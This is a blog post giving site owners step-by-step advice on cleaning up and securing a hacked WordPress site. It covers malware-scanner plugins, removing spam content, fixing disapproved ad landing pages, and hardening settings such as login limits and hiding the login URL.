WordPress Hacked! How to fix & prevent – An intermediate guide

WordPress hacked??

**Note: This will only work if you have access to your WP dashboard.

There are few things as unsettling as having your business or personal wordpress hacked.

It makes you wonder, why would someone attack your site business that has been nothing but kind online? 

In one case, I saw a 501c3 Non-Profit (meaning they take 0 profit or salary) wordpress site be completely hijacked by hackers, used to create black-hat links to promote Cialis-like products and mail-order brides! How could someone do such a thing??

Maybe coordinated DDOS attacks, identity theft, cyber-racketeering, or something. And at the end of the day, the reason doesn’t really matter. We just need to fix it!

Fixing the hack for free

Step #1: Virus Scan

The first step is to use a trusted malware-scanner plugin to look through your site’s code to find vulnerabilities and suspicious changes to your data.

Ready to spend a lot of $$ on anti-malware software? Me neither! Let’s download the free plugin, Wordfence.


Search for Wordfence in the plugin store, then install Wordfence Security

Follow instructions to get your license! It will involve Wordfence sending a license key to your email, which you will then use to activate the free software.


wordfence email instructions for wordpress hacked

Once you have the key, go back to the Wordfence plugin, click the button to activate your license, then enter your key & email. 

And the, when your key is activated, go to the left side of the WP dashboard, hover over Wordfence > Scan > click ‘Start New Scan’


Step #2: After the scan

When the scan is complete, it will tell you all of the vulnerabilities and issues it finds on your wordpress site by using Wordfence’s database of known attacks/hacking methods. Possible results will include:

  • Critical problems found – If wordfence finds suspicious code in your PHP files, you will need to delete the suspicious code from your theme files.
  • Plugin updates – Make sure to update out-dated plugins which may allow hackers to exploit your site

**MAKE SURE TO BACKUP YOUR SITE before editing your code!!



Critical problems found

Plugin updates

Edit code or get some help!

Not to tell you how to live your life, but you may want to get some help when editing your PHP files. 

You can reach out to a programmer friend or family member, learn yourself, or contact us or a different professional/consultant to help you.

If you decide to make the changes yourself, here are two basic tools:

  • BACKUP. Backup your site! Updraft Plus is a pretty common plugin to do this. You may also be able to backup through your hosting/website provider
  • ChatGPT – If you’re curious if PHP code is required or possibly malware (like the load_template code in the ‘Critical Error’ screenshot above), consider asking ChatGPT what they think about it before deleting.

Consider other scanners!

You’re also encouraged to try other malware scanners as well, if you want a second (or third or fourth) opinion. Just search the WordPress plugin store & pick a couple with good ratings.

The process will likely be very similar to the wordfence one.

Step #3: Fix disapproved landing pages

Even after your site is cleaned from malware, you still may be unable to get your landing page approved by Google Ads or others due to its previous code.

Ask the support team what malware links they are finding on the site, and make sure that they are permanently gone & that your site’s cache is cleared.

As long as the malware is gone from your site, you can easily fix landing page disapprovals by just duplicating the original landing page & submitting it with a new URL.

Yep. That’s it.

If you’re not familiar with how to redirect:

  • Duplicate the disapproved landing page & give it a new URL
  • Delete/unpublish the original landing page
  • Download the Redirection Plugin
  • Redirect the original (now unpublished) URL to the new (duplicated landing page) URL 

If you’re not familiar with caching:

  • Download the plugin W3 Total Cache
  • Purge all caches

If you’d like me to talk more about caching, leave a comment or email me! 

**Note: Again, only do this if you’re sure the hack is fixed. Otherwise, you might be violating Google or another advertiser’s Circumventing Systems policy.

Step #4: Delete pages, posts, and comments from hacker

Now, it’s time to delete the content created by the hack. If this didn’t happen to you, congrats.

While you could manually delete all of the posts, categories, pages, and comments caused by the hack, I recommend downloading a magical & trusty ‘Bulk Delete’ plugin.

It will allow you to mass delete content, saving potentially hours of time of deleting page by page.

Step #5: Prevention

To prevent future hacks, I recommend downloading the following or similar plugins:

  1. Limit Login Attempts – It does what it says & helps to stop Brute Force attacks to your site.
  2. WP All in One Security (AIOS) – This plugin is incredible, and gives you tons of control over your security. I got a paid plan myself & recommend it!
  3. Google reCAPTCHA – These are the ‘Prove your Human’ tests which help prevent bots. Make sure this app is up-to-date! AI and ML is growing so fast, it’s important that your always using the cutting-edge reCAPTCHA.


AOIS - maximize security!

When setting up AIOS, make sure to hover over the WP Dashboard icon (on the left sidebar) in order to use all of the available features:

By using the “User Login” setting to change the wordpress login from “/wp-admin” to something secret, i stopped login attempts to my site!

General - Consider deleting your email or phone number on your site.

I know that this seems crazy for a marketer to say, but for my site, this is the best option.

I got so tired of mass marketing spam emails to my personal email and phone that I removed my email address from my site. And guess what—it stopped the spam.

If someone needs to contact me, they can do it through my contact-us page. Oh well.

Theory: I think certain people in certain countries with low energy costs create massive email/phone address scraping bots which go through the google search results, scraping the addresses from website.

General - Backup, Update, and scan regularly.

Like I said, out-dated plugins & themes can cause vulnerabilities.

Also, regularly backup your site (especially before updates) with Updraft Plus or through your hosting provider.

Lastly, don’t be afraid to run an anti-virus scan even if nothing is wrong! You never know what you’ll find

It’s simple, but makes a big difference.

General - Don't display your theme name on your site.

AIOS allows you to rename/hide theme files so it’s more difficult for hackers to figure out what theme you’re using.

Often, themes will display their name in the footer of your website by default, which should be deleted if possible! This gives hackers the blueprint to your website. Don’t do that.

In conclusion

I hope this guide was helpful in fixing existing hacks and/or preventing future ones!

With this knowledge, it should be easier to get back to marketing, advertising, and just plain existing online without fear or exploitation.

If you have questions or concerns, feel free to email me! Good luck & save travels.